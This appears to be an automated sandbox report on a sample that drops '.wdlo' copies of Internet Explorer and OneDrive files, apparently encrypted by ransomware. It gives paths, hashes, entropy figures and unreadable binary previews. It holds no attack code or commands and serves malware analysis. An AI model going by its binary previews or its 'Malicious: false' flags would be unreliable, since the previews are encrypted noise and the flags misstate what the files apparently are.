.h...W..3.{....g..iZ...r.......d..6~X..=.1..\.1.!..Hj..Ph..I.....?/Y..Th...{......w...}...S.?C..4k...oM.v2.....oB..H...?.Hh..q...#Y.....n..K.C..'.N.\...)...j.#R.a...c..........).......C....F....Q[.LR..B.Z..=1...oi......>..?l..kdq..!....y........H.......Z....0.#..w.h.&.u.[T.E....[.Z.!...6...d...4].Z.2....m..g......^a2.(.}.?...U........&...,...J..F?QK....(.s....7.z.U^.....,i.i...I...a.?0..j.........Kyq.EC..\|.V4....>.%...jw.G...k.....!.F.'....*ic{v.z.wy.:B....(^.>.....L...\n.....nz..<._...1....D..KU.......\|(M.G...V.f8.e..@3M;]l..h.....&.'?...cU8....u@..M..}..U..

C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	35951
Entropy (8bit):	7.994104717121171
Encrypted:	true
SSDEEP:	768:Bv+JnQVaViwn8/T5H6PaXcGDXnnxp2IxACJjcfQeR6TQmTu:B2Jn+yFn8Fa8cGXnLLbrQm6
MD5:	CC00E06C550683BAF6FB26C1BBF23DAE
SHA1:	A2DA90442C52564FDDE302D100D4FDD2F5B410BE
SHA-256:	17614278FD7B8899C73B041B0249BE699B640CE569FBCC0C1689C8290F4BBA6D
SHA-512:	B40B2F03D471212FD2BFB8479FA53273D455928B491DB2E555823AC5B70DAAB10791C637F3581422BA6016BDBAA221CCA5A5D07895220181521E8C46A8B0F998
Malicious:	false
Reputation:	unknown
Preview:	..... ..Aw.S..?.+..\9.>...Xx.m.6.T..u....u.B@......kPjF....I.@....%]1B...z..T.......B^n..}x._..{....0.1.H.4.x..5.S.P..uD...Sm......?...5..V.....}...3.BF...)...B......m.r....v.....Q.;2N..,.LZ..EL.;0....^..L..f<.v.......zj....c.z.1..................vc.7.\|..O...=....@4..V.(....EP<...w...^Sm.M..78.v..~6o........yr"8.t.......F....M-.)...Z...duq..f...e....r....7.xy....>fY......q..A..J..r. ..:ub-4s.....C......y.>..&..3.<].jR.{......Z..g...*.b....;..G..../ w:...kM.....Z.....~.\..t.u...fmK...~.'d...k..z>T.1...C.a...>{6@]..c.6h.4.......KCQp....S3b,N..oA....eo.#..........2W3.e.XA.r..h@...j...<.\|.u$.y......s_..#.cX........fR...(..[_.@l..N...{.#(.....'C.....<P..01$...3...t...V._w..S!.#6.TI.....R.'I.q......!...k\|`..9O....T..scP...b..P.S...7.......XX...P.v6.bM...<.c"........Y\|.b.N..AO.W{.o5........<......`Wr.$\..m.;.q...p..:..Z..4.)ox..i......P.... XZ....I..-].....1...j]...F..!.H...=.o.G.o..O_zBD....X.O7....Y.......(.G};..(....e.]..oS..W.(.NEv....+....

C:\Users\user\Local Settings\Microsoft\Internet Explorer\VersionManager\versionlist.xml.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	16179
Entropy (8bit):	7.989419758127256
Encrypted:	false
SSDEEP:	384:m3te75roqdoufTXe8TRbOEujhXdga4LCsgGNAPWmVzdnqnm:mo75roqW2KFd9mBT+tvnT
MD5:	2788294673A920FBC4C988DE7D6539A1
SHA1:	B5D80958D4B022CEA5F9F9E54F56D359E6CB872B
SHA-256:	3B8DC9CC66E43042A1DF7AFB47804D7B92EFC23CE676DC8746CE585366651E2E
SHA-512:	AE9A3EA7599D1DCD6BD3A0082A10D7F04FE4C777B6CA3D32B0E44AE908CE0C5B2AA0EB25C4053F759680E5690080ADCECD361D40CADD693F9A26D14D647031BA
Malicious:	false
Reputation:	unknown
Preview:	.<?.D.9.R....+.r.............Z...)j.&...`B.Q......3.c.+..sZ.A...U.7r.%#3-.1".../....5a~. O>.4[)....fC......s....q..=u....!..T...4....y.i....3../.F.=.%.N.1..,...o..sE...KH.(.YZ]s.L.@.>.....(.g.....ym....{.SE.v?J^.:lX]....u.)-..7A.A.A.F2.g<......zf.,.E..q.I...N..@.Q{...PDfE...J.....[\z..T..Qr..L..Y...e..!.......\|......X.(d;.C&.z\|.a..+]07....g.\9.8..3}M`.wq.v..%:w0..F.8.p..}...5<..K.;mp.3..........._.$...^.#eXr.h;........YA.7!.k..4..wV0.7...0{.....P..%...K..h...QO}.....:......l.. j..$..b.....v.......1.%.../....W.m.7T....Z.lt../.f..9.4U.L....`.){.<..1Le.....O.0.K...{./,.0=HV.c.K...C.S..V.NUf^.~...2.syQ.x..uV..R3..V'..........v.R...h..N.}]-.l..=3...i..[ZZ..-.M.kl..P. ...BX...@..8.'.e4..R1......s.7'c..U........p..s.......u..y..:..ra....Oy..g......p2/...../.<.N5....gq.o.@......2T........$mI.&}+p...@:..c<...N...TEu.yVc.v...KfE....M$.d............A&..!.OQ...(\|....%....}m.`...{.V.._'.r....6.....Ar.."...l.MKf..@......T....7dlOJ(.}..en..>...@

C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	6910
Entropy (8bit):	7.972009826231827
Encrypted:	false
SSDEEP:	192:8nOqybX95N73v7uwuwn76zcAsM4zsTGtbRkZPouH:Wm95Nbv7aw7IcnMrTGsei
MD5:	03A3B4D0C0E26E802F13135173479E76
SHA1:	5CF077AA9BC8B8F09FBB42F864137991CB89CCA9
SHA-256:	70D6324800A4A7FD20056C8E0A5A64E076194A9F21774A6378A8B0FEC7BFCD92
SHA-512:	C2172894F6296302FE466CAF4EF9A1DB84A2472EF2503A1EA58BA5F4B11252F331A665D46B46D00549FCDB9CC78ABA9F79A89A042F7C88CAA0239687013D2FF2
Malicious:	false
Reputation:	unknown
Preview:	06/27o'..Z.c.[=..w.N,..:.efW.Y.!.I._.C..N......r..R(..ZZ........Ed.....e....F.o...-\.y_..sp,.v=fP..`..v...Qt..G...8n7.....z<..7..j)...4K.}...T..$.............76.~...B.6B.L.W...IB7..+-.....{.....lr.....X..S..L5u3...9.,..J]...e3/....O_....I.x^t.%..g..p!...s.dYj.-Q...s<..1.=..}$$.f.j.J.d...f.v..H<E.W.Jt....b.Bod.......=.._kz...........N[..f..%R...;f....#...k.Y.J.."g.(k`...-(.....(#.....Ec..(E<.[..#7u..4zh.f.i=f.>....L).'...w.6.f...?..4/....W.n.6.u..O.~......,B%..Z.O......Bg..t..%.....^9....1...J...e.1'../...O.\..%.".?6.p.lAG.vb.b.4UqR.P.!.i.v....>.T.a.t..\|/...Rk..,O..?..u.F....!Y0e..A~......_.6?..........J.....6=..4.U.w..B.}.Y.c...q..\.]...5..=.....s.h...#G.}..K.f..mu..w(U.\..........W..j]........YK..'Dl..(..U..Q0y.....Ra.I. .....k..gw7(a.'..v`..F....6.. ....3W...;. .k...... 8.Q...}t$.2..wN..?g;.....6.V\|M.....C.d.S..f.WB..h.E....;.mh.....!!.n..%.-.....f...........r...hZ......<._W........{m..~....9Z.lED.^....d.... `+.....*O........k.

C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	7.829799156295188
Encrypted:	false
SSDEEP:	24:QZw5t8SKbUFNXqRJNrF6Vf2cuAgCr0bBIAFvaKNV7Zl5Ohvvn6OWFbD:6wQUFs9rF60hssFv/V7lO5vnxWVD
MD5:	FD5902FC9AC50802A1C47B9317F5FC6B
SHA1:	DA4A27286B1984D58C6B80A8FC03BF79A3A62FEB
SHA-256:	96C28F2707A3C3B04DC7B32DE49DC28E30680CB280B43E9819220DEF86AD2787
SHA-512:	463EC1859D4423B2DF978E44578410F04EBFEBB0C8AA196B1953594A414A417B3F7B8E21F373FE5F7D0B79BC42B9C31361AC1684F81326CE6165A92A53AC9F60
Malicious:	false
Reputation:	unknown
Preview:	..E.xI..q......W(..C..5..F}.Z.$7/zE.](...)2..R7.6e.1i........l..(..D.d..y..?o.t.i.V..P.^.q9<`.......n.B.:..dY`.......}K`u......#......)!...M...DK.@..i.1.ku.?._.}.~4.9I......s.jI..!......7..y>N+.qal..s.....z.r.W.'.y...p...J>u....._?...ra ...t.t....R.q..\.,EP...=..zz.l..D..\|o..fcp...H.....ZCjz....!HX.XG......mY.i....2../...A$:.l..I....id.......\|e..M2.(>.P./..'..#..........u..%."...+%.;^..S..(3e...!.^.F.^......(...(....W."S(v!..R..=[.o..n.....m......./..Od^1G.-.g3.y4..V.....w.k.^....j-..?).m..F.e.5d......j@..x..h.Y.\....].rl\.OH.3.....L.q..n..?WA1h....g.......Q.18n...5.w"..Z.q_..).M..."...C... ..cy...$.x..mYi.<.`.........}.{.a.9.......Y.\|....1w..r..}.=2.N.Tub.$R7..I.7..y. ......+...V@..'"9...\|O.....V........:...q...._..)&x.sG../....]$5.K,N.d)W...01.`...)^... ..cM..t...t......u2.s....>...[.O.......>`.P.D..es&.`{H....%........L..8@.Xcek.Dr..m.....k.(.H.....{.%......J.....L....S...;..0IH.]..-.....bd.`....B.UI...#C..X....<

C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	1648
Entropy (8bit):	7.900554494140799
Encrypted:	false
SSDEEP:	24:QOFMjBUlwbwEcoGaxsJX+436gyFmvHUPmYDdsfwCqjRbt3T/OYkry5sWrFSwL5Wt:4SHEIaxC+y6HyUnsrSFHkuGW8wL5WVD
MD5:	99E9070E936D5A9E9D885409F98AAAA8
SHA1:	0DAA00F7AE6E94404D54C601B1E44DDA1340FEE3
SHA-256:	AAB79573430530A97CADECCA16EBFCD855F872C740DC71195A82BC74A01B652D
SHA-512:	EF8CAADF17C956E206F7FF28A7A7C22E65A4D81060B09E4F50DB8512BA8C89D90518500BE37D6E94DE5853089AA7C5C50C0E82D9E57C4F754EF49298A52F85D8
Malicious:	false
Reputation:	unknown
Preview:	..0.6...... ......Sl.^.....:C.. )...\...}.Wn..z..<r_...9....5......j.tR..v..9wT^1.FAN.......\?{.Q.gRR..!^.o..4_?......I.Z..1..McH...j..oE....:..e.....%..3...j.1.DJ.?./.I.b/.q,..+ {;c.i.o.......n...U.B.7v...U#...p....[.9.....P....9.....H.;.-....o...1.N..D....4#.\..`.q.%.pu`+....=..K.m.Z.vJ~.n..2u.....P..2....L..+...I(W.=.>..@...(..EU..E..<Z...kU.n#sJ...)..Q.y[.e9...eh.P.-.>Lu.z.\|...4UO..1.........o`...<..s!@.Yb.g..V..o.y.....<a...5...meH...3.{.......=....q".Kq.}...^O..1.=.....R.vu{.MGK.Z.M..[......2(.n..i.fw8.a...HH...bK.F..;.(....A@S...Mj...\|C......'~.7%..rX.~..].L.....R1%".#...._..r..M.P6.1o.=...hp".<.<....)..(.O..)..K.7.-....Bzc.=.=$..D6...X. >/..N...A.?mjx.x.).......R..#...2-..Y......H.c:}R.d!.......!.+..\...w0.x.!....t..3....z.S!j.$......A..Zd.\,...<Q....e..d.._.!Q{L.Iur............y...D..e...~.%f2...v...O.%./sP..(B..*.......F=..m....6....Z5t............u..(...l..cf.o>dN........>.K.....C.S...Z.8n....>...^.qmr......I.&..vE.9

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	986
Entropy (8bit):	7.770369853948399
Encrypted:	false
SSDEEP:	24:HSW2uWP7i5GQQR6VDIKokIfoWd5Pz1mcAfGrbiWFbD:yVpP6pS6FWd95TYGXiWVD
MD5:	CD061D76E6BF071B38C198680374632A
SHA1:	E11E65553795A4AC3A33FAF47CA93646BCBF5EE0
SHA-256:	FF3F49D95919208C7E4CB5DD03E783BAD028181F15AD5DBA6344862D1820550B
SHA-512:	C1C0467AF675EF22BFAD0DF38ED3732FA143E8666304A78682B228061B59670BFD1E083D87873F4B3BA76DAC3D7701CE3DF4876B616C2825D6FFB879B22CAB67
Malicious:	false
Reputation:	unknown
Preview:	.PNG.T)I.).>.A7b....4..O.l...RB... ...Nh..!.n.z.....`...:3.m.\|.Z.wb..-.\..Q._.N..-.1 m...?......Bag..N..~.,..H...^.X...'-..R....G.`.!...X\.[...1r............2...$H.E87.@....j.N....L....8Dn'w.]:2.....d...a+...!..#n\....E...N.[.....Xo...'{N&.<..m..3.e_.$Ll...,.r.......(.z..[~......;G...D5...r..Qmed}Zef..9Gi.9.?.V^...;.$...Z...L.V.....u.... S.N..v..QP.H.'....E..y(..8..H./.-.vk.F....#.../.......2..Ly.fk....\.v...fkx.......<7...a........37.......n ...l...B.....~k..x..c..p......1.\|...0\| n..J..........\|N.../...1....LP..7.X.QXd..t8`K.7.\|...i.J.^..0G....z.U@r.......$Y..S..S..\..o..\.vX....`c...l.4...d..l.37.bM.X..[..pe..gk(W.Nq.....2U.];..xgT.i=.....\Y..+..B.....g...9..g....y.\|.6u..c\|n.\.."...I...vIb.?.$bST..d./T..T.#...!...J!..i......-.zq\.]#.>qE .pZ.p...L...&g.f.u}.).!....DY_..B...u'..........2.qk....*~.0..s....`}.......x..\..b....Au.h!....d\.dxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1182
Entropy (8bit):	7.832312902757137
Encrypted:	false
SSDEEP:	24:TWgetzbAd7VB0/b9o1ypKYPiG76yobv64OpQIwsicA2OWFbD:Fetzk7UqATiGpoYQ9VPWVD
MD5:	C6DC0A92F31041CEE5B5F2CA90C6F338
SHA1:	F850DEEB94A74B173C838DB75C64926757D2BEC5
SHA-256:	25E556B387BB42F0A88DD1DB8548D7A8F3DCA0F105186F1BFA785754DA2FB88B
SHA-512:	5011BEDBC0EC975DD7D47BED790E703DF92B50C2C9FD6F4E5EEB7FE5B73A0B0F0C94A2D74DAA0427EC7FD1E10949CAC1A922B466D36A90A56BBB74C93C626BE0
Malicious:	false
Reputation:	unknown
Preview:	.PNG....&..D.%........0U..M..OE......4K.)/9rLfm.]z..'.(o......f..{...m6.5.{.j..U...1...B........>.....^..1.;..X.....bj~..q..z"F..Rc!.<a.;.s.............O...0....P.<.b.v......Lo.4..#gS.sm..y;4.((%...V.<......s..........?#..H...Q3...({D..%.MI...B'AA....E./T.Z9.w%@B.I.....Z9..D.x....u(.\....6W....6....A...R....*X........ntG.<....nE@.......S.P.LU.5y.....iD.-.1...?%)..0..Y..~,y.W....i.Vxb"..h....K.&........j.....,.TP...91..m...\|&4...oEb......e../..N.4..G.D._.5`..<B.........Q.~..G..._I`..m.....I.\.8:....?.R....c....Lj.V0..+...\|K..+.b..oB..........#OW..../hR..G.m.e.J=?...;/.1.T..\.]....f....tb....Q.}.i.O..^..c9\|5F..Fe.....6.l......8.gs..m.^.9$...7H.a..ei....e...2.G.).8.G. .s&..q.....S.y.U'......~.?.X.N}....K\|n..."7..=...=.M..ir.a3.5Q....'.o}^...N._.Uu.J.P..y...e....$z.5..t..].Ls..59.......:.......0i8o.F..U.}0qg.X....f..+W.......L../5.BA......'.e.......mx..C..q.$.\|n.....>.}....\^..`8......)..@..E.''...U.M. .......LA..L..3.....R..Ei.+.<....,VS.....p.EI

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	7.855496489365916
Encrypted:	false
SSDEEP:	24:rzvN7Of5nOMYW8HjRPBxStxZYnjdCrtOZhqBoDDR8WFbD:rz5OxYNhStxZYgtWR8WVD
MD5:	0DEE922604BC016D2F0E71F7AE650006
SHA1:	85D02E7C7C285CC337B386C6662833578D4BCB00
SHA-256:	292B7A7911B7E10AC647646DF1C978F1039FB27DABBABAAD8544DECDC86D4D75
SHA-512:	A821A89F8996E31932833515D9196B9916AA96320DDFCD373B02DD8ACCBA7F3FAA4FEB83263443221204E41EC870A02047D93FCAFCE7EDF89D1E72EC38C82AE7
Malicious:	false
Reputation:	unknown
Preview:	.PNG.$<.c.f.......C...W,....\|.'.5....m.....i.?...~R..a.4........A..8G#...+.8.}[..b.Ao....4..{...ao......$..&..=5.C....)....r.i.XO....G.".....n.YWv.....9..NN....VUIr..Z."T..........r.+M..........\|R.^j...<.b..#....=g<...m.T...#1..{./....\._.:.U..,<....Ge...'.X.o]9D<.WH.m.CBY.}O....)..D..5.`S.O.H.>rJ.#.c.....>.$(...!M....E.J....)Q.........9h.4.Zrf+d......Q.......5.......'...[..., U.^&...l9.x.....'....W.@...e.Z{.#...5..).~(/[..c.T.:...QJ..K31-.\|...Dj...4I/&H.M.y.Lg.......2u..2..Z~b...0H7U?....\Q(.F...._.../M.I..Zs...FC.Q.a9..V2-RU..zQ.......9..?a.8...{.......$O.l...W..6v..s^..#....'q_..T.....=..n.~8.i.,..z.n..E9Ziy.p.....ZXim).i,lk.0"7E..#k...B.......>=r........f...X..mKn....3..F.."..qgd.5.W...........hj.5..0\..kw.F...+.Y....R.eV.J..+.S..y......Z..f....H...G......`PF..Bn..B6s....p.^..SYl.#N......H....u.:.bT.F..X.....<./...Q..........2....)..}..l...."Q.N..J.p.sUO..S.......B.jN..^...V......c&..-.o...2 .p.P...t.)..*T#..~.C.N.E.g...2.

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1726
Entropy (8bit):	7.892195462160448
Encrypted:	false
SSDEEP:	48:FQuzLrhCxfd3NZR1MOFyQIF3KUvy9ObbxJWVD:brO9ZYOF/IdKUUObbA
MD5:	5C221394C15863ECA24D434B8E6C1BA0
SHA1:	C7404270FD3826C38031E5538C91EFA850E63B9D
SHA-256:	E7E3BA19B1D1F2C8C7AE2D04C3E54BD07AE078AD4F8957B6B381D20EBCEE92C2
SHA-512:	D77F70FD132452670FDEE01B3C7E3DB65F89DAEDF3198D75C42FBE33C158C490AA1139D1DAEFE4BFD380C1ED5C64EBA1E2423A65F3E80F87C14F82A96F00054C
Malicious:	false
Reputation:	unknown
Preview:	.PNG.QK.5.s.<+...q.K.}.....C..H.tx..%.P..._.n..m.`j.#\......'w{>..\G.....Rq.....x...`...qv.}.?....A.w..:..$.<.}.$............<O.5..@._......&.-ge......}M[...`g3<(K....@......r.^............~.C4.Z..f..@.x"....z.'.^fM.B...`......=......?.......W.>.<.......I...e.....5..,d......f..5....3./..H.r.9y..9..i..Sf...>.K...P.".<..Crg..hz...4..f\|.LK..U.&.?v.....2....t..h...=.....Z.j* .BYbP@H.a....:E.......G,.N .!!H*...T.>I:d.R.. E.c....H#K.......`..?j...&%..o.o34I....T.H:.2.2_d.....Rg.r.dy..D...3"..[?].}...FK]H.Fs..f)=..T....'._...9...b....o..-.Gn...p.~../O..,...i.'.l.....u...;.fK9.cn=...4.....Z.M.Vy......W.G.#M..W.m.Iu.......S.TE.K...HZwn.7...O....r.s...[.;.oQ.J..&0.....Q.......%.?.t.{..yk....).........r<.2,..R.$C.F..a(.t'.`...(.N.D).h-.........W..9{F.6..q..uOK..@_.x...O.....r.p......I..n.3....it.q...j....b.h..(J...y$Z!..C....z2.)-.^-..KF.@\t.plk.Dz.p.._/0>P.Sh.>ICG.Wz.........n..pB..../;....e...(....>h\...K. ..0,. .^...}.5...L.d..,.K.?..<.^".

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3560
Entropy (8bit):	7.944996949915787
Encrypted:	false
SSDEEP:	96:FjXDJ3EN3olxpcrxOy15E++tLUK+hsA/4YOHS0oy3:FbNEwHI1+++tYSA/lOH9ok
MD5:	649F2AD388D8CD39027D1A9FBB873635
SHA1:	A4FC03C5ED61A8AE32C02981D417A72196B75F6A
SHA-256:	F4A8DD1685C9E710A151B057BBFF848879C0034648319A8AD89254610CFDDFF9
SHA-512:	1175F1076C0B7711EE72B0636BE1D230AEB1A21E6938EA7BC1E31367AD0AF6CD7B3EBB787287712B59F262E0A7E0DE0178DF23EF60C240CBA791CC1BDE667AAC
Malicious:	false
Reputation:	unknown
Preview:	.PNG.w.b.a../.@'tU.?.5y{8...yN....H8.4HZ........'.uG...:38..v&..=gA)8.....;..K...Ai.z...x(.Y+..r.._~....'E.2FE...5.)0.sF..t........r...ch.kT......Z.X..b4.v.,(..%.d'UN..e.1.1.85.'.D.`.wv{7#..-...Q1...C..b...Y.......[~.P!..)X(...Y...dP. 8...O\.g~2..T}W.....A'.o7F]Wa]&N7.8N.8b$.=..2.].X{.9.9&..7.;G'.!(..,.]........Z.K.i...O..? ...... ..[<8."p..X2g".G....>.8jq.3.;...>I5..oRR.........z.M.[i`.h.r..D....e...i..qmwm.....t.5...'.&.Abn.nr...}?.3N,..@..m..ZgG8%.(.N.. .J....5......=P...Y..6,.S...9.C.q.:.y...[.U....a....C..c.?...vq.w(.oWN.......$..kV.....5eA..O;....WR....<./..O..R..8..>!.{.tN.......DS..37..C...W.e..l...\|.J{. ...y....o9A.@`....._.....#....Q>.aK.~.."\|Wk<8Uw..;...K....7P.....1`Xd......j.$wo.b/u.W.....;_.u....*......eS.._h$...X..m.\...!.<E.d$.U...9..nS..!]...:.......z.Da.[.....&A=\..h.D...C.J/i0...Dt\|..+"nhb.'^OX.JG\.../...N.g.7...I...9...M,Y...Dd.$Ol4.p....`.{j-.w..%.f`..,b.h,......J;..r....dQ..\|....O.$)....F%....(e.z...AG4uN,b.r..]..3T..@...

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	996
Entropy (8bit):	7.761701754109818
Encrypted:	false
SSDEEP:	24:EEACf5E9MRk80X0GRtmzypb3OixGrqk7OWFbD:6g5EZ8+0GRUypb7Ymk7OWVD
MD5:	8470006E3386C33CB7162EBFD0AC0E39
SHA1:	B4DBE4F5BB4C319E735ABB63DFAE261D5DFC1BF8
SHA-256:	95DF2816A68EDBD40EF155C1A4EA8B97C62145E10F9922D6B979DA9150A0F604
SHA-512:	05C4177412B12693F1F607E90DC57A849EE8E855C381466A427F4E6B94B5E0ED9837A320591CA22F56951AC0CD7566C9FC140A95FAD8D380BD10786D5E57EC54
Malicious:	false
Reputation:	unknown
Preview:	.PNG.?2...@X..9..O...(>lT.......6...3..!.y.Is.\|w4^.(..;..od=S..........[~2yRWB.4.)S3....,b...N...eP..:.....v........l.:.s.D...g..0..#T.^.m..#`.`?...!.......".....+\.r. k.gk.....A......;..P,;.N.n`ucrZ....%B....+\.s..5`...].$..^./.G.%N..[.e....us2v.`..&.5;2.3?.As.P.{@.\F.9W.jJ...g.]...\|.o2.p~qL!\|l.(...U...QJR5N...#...sk..eyYL.W...o...p....%@...@.].+...M.G^.g..<a.......\|.AK.<..<.f...8........p..pHJ.w.P=.m.......".4.F. ..%.......k.N.n.2'..?N...5O..-.....wy.r8+.3......+.,Oq......4.....*...>.X...vo..E...[<\|:...+.M-~......uF..b.......Q....'z./R&.QH.:&Sgk\|..2......E.._.{..+.o/. ,......q.=v..1....s.y8....T.PjG......(....d)Q.;.6......v.....0....k.....$.R...[.M..7&;.....8..D....o ...F.p@&..{...m&.n)e...1.'0...3\|.....=d.z:....P.....w.}..k.}..%8;.#E..=..\|.e...r...v..L..r.<{..p.[.u.[...7..@KP_...L.^.}.._....hY...%cY<.E..<=....C..b.=.q~.V........%..@d.....9...$.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	7.821071620487136
Encrypted:	false
SSDEEP:	24:n3ISFOiiCgNoYsAqAmTAXX3pdewg9W0WFbD:n3ISFOiiC2o1cXX5Dg9W0WVD
MD5:	B2DB48CA3A48EFF3B3FB742EB6158762
SHA1:	24E9B2FB8C1A5B5AEECA16BA22B72E18CE1A5222
SHA-256:	882FC406B0AE80B17E8B09F4ED34D1618B08587E30CC85E81F3DA7A0A56F6485
SHA-512:	18179ECEAEB065C8D5BD65EAB160801B9BCEC701787280650E18C6126AF648040AD1A20BE5D7F6B812D0E159C99AF6D4D55394F90A33EBF1D30C0B0063B9D338
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....c.......s....$Jv.r.b.L:Hgt..-......X...'..[.+H..l._......(.'.7...Nte.\|...c..d..?...&.@-...r.B...h..s.h.W..`..$9.....>.t.{.........4..a.......1..8i.'.#H\|z.[.)..I..x.p.O.H:.`<`^J}...Ow..Y..}1tr.!J...1ON.Q.....vQ..w.p.Vh...+_.......r..SZ........gC.g....S.e..{ .U...."U.)..#.[E5N.3..;........x..>......2J.}:B....^".9.Q..'.%=..(.f.&...C"..A..>E..g..P.........o.....O....~..e..I..;..[`.t..........).)X.L@J........r.`...^mv$.........`.......0..;zUt....QO.K...F=......T..%.]......c...3..5......[.O.."\|.M .-.0.=.).."...@..Gw}_.......O..).X4.=.A.92.....3_.qj<..P[^.ue.. ..4....Q.j......8r.Ea...j"....1.....c.s...CK..E.n.B.)XX...C....O..n...B..r....w..OT.s..]<.ET.6.H.....s"...@;R.".....C(.\....^E...O.).44;.O.i...6...t..p.$=O.;jt...V.l{.[#.........O..g..2!....~e....)S..J.;.J.m...[.<1hs..............\..vX.M.rF..S...Hr..c...`L^..H97.6....q.f....&+3Z....N..mz,8...$.d..1..].....A..#.Q.*T]..U....^.O.. `W..`_.D%H{....,.......K..N.F.?........X.p..O.!Gp.c.#

C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1134
Entropy (8bit):	7.79406232072888
Encrypted:	false
SSDEEP:	24:GJU3N7VYDTS/1BqYgzLIUn/WKYSeADH5K9o1Alv4SoySC4WFbD:GJlPmMYgzLIirZDZKYAHSC4WVD
MD5:	A05AB555E25A78FDA1E97C30A1FDD354
SHA1:	2922C18C6CC6B09B72D82EFCC7987F673285FCDD
SHA-256:	B9A4C928745CEF04BA5434E88F6EEA88E600981BB28F3F8BCC8DF2EAEAFABE26
SHA-512:	7F510C715B72A8E12D22C24152810134C3760A5B42A4273A9080755678ACD465BD7C6C266A2878FA91B55412750AB44F56A2B1FEC0F0E22877E0E0457101952A
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....P...%z9.....rNu...v.`...`yTm}.......-J..)[608.,..H<..!wMR.;]........'......f.!.t.8<..R...5.:U_b.u.4..X.!`.m5s.E...Px....;...m..X..(...o1.....0....4.pq.....f..Du...].m.&..Dv..........,.ge.....c[%.'.-.r..y7.R$..0.n....h...&'1u..j.T.L.83..8....h(M.@f`.l>....o.b..v.XZ.R. ....B...}..O.m..\|+..M....V..Vq....m..BlZ.4[Y2...7...;....C>23.PB.XM?.c-....c....5M0....\Q..^1.r.S...N......+Z...,.....0.?.EB. x..D.O.xP..4..k-H.... ..V.%.^KR....'i.J..D....&+....`V.)./..,wP..4....y.lQ.........9....2.=fw..j..F3..H.....-.^@.......rn...5.......;..r..u.B-.1.2<o.Uur..D-.m3.~'...X.0.=..m.1qR.5..z.UT.R..B]..y%^`...z........:7i...'y?..j.i..q......D.;..!..N...\KM....wb.....~....3D...T...t....J.6I.I.^...:...`9../..s3]%BhU'.w/....,..=.....S..`............J.Y.........R..O....ZL..]..d...(.. .,+R...Mb ..j....Yk.{..,.m.[./@..f.......>.K..@.h...g...>.YG..orv.W..."#;...}P.........._.....\|.....IB`\|.....P.u.j% 5ij...]\|H...gO.q.UR....].Zz.w..\.;$.1..fe...~.......#WF.........

C:\Users\user\Local Settings\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	678
Entropy (8bit):	7.634646485436081
Encrypted:	false
SSDEEP:	12:0ixphJolklKOSFlDEgCa0//SMg2BIRqMeBZ+XbpAl6Dj6Z3cii9a:pPJXpSqn/SMVGqUtAeWFbD
MD5:	DE9996C30E09C9AB784C309A4789BE1B
SHA1:	5DBC1E79BA5459613A4D95B7454A40C7F5AA6646
SHA-256:	4F807AE119AB27012754B3E155EF9E8CC4430C1914CE3A0175F58DF7EB924567
